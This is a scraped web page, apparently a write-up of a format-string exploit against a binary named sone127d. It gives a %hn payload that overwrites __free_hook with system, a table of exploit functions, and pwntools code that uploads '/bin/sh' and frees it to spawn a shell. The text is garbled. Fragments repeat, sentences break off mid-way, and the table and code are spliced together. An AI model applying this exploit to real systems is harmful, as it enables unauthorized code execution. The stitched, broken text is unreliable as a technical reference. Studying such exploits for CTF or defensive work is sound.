Home | Downloads | Forum | Contact Us

 Dernière mise à jour de la page: 22-Fév-2024 5:14

Sone-127 - 2021

printf(user_input); Using objdump -d sone127d | grep -i printf :

> echo AAAA%low%8$hn%high%9$hnBBBBaddr_lowaddr_high Where addr_low and addr_high are the low/high 2‑byte parts of __free_hook placed in the payload after the format string (so that they appear on the stack as the 8th and 9th arguments). SONE-127 2021

| Function | Purpose | |----------|---------| | leak_libc | Uses the format‑string to leak a libc address and compute the base. | | write_free_hook | Crafts a two‑write %hn payload that stores system at __free_hook . | | get_shell | Uploads a chunk containing /bin/sh and then frees it, invoking system . | | main | Orchestrates the steps and drops printf(user_input); Using objdump -d sone127d | grep -i

def get_shell(io): # Upload a file containing /bin/sh io.sendlineafter(b'> ', b'upload sh.txt') io.sendlineafter(b'Enter size: ', b'8') io.send(b'/bin/sh') io.recvuntil(b'> ') | | get_shell | Uploads a chunk containing

# Trigger free -> system io.sendlineafter(b'> ', b'download sh.txt') io.interactive()

Copyright (c) 2011 HexRay Ltd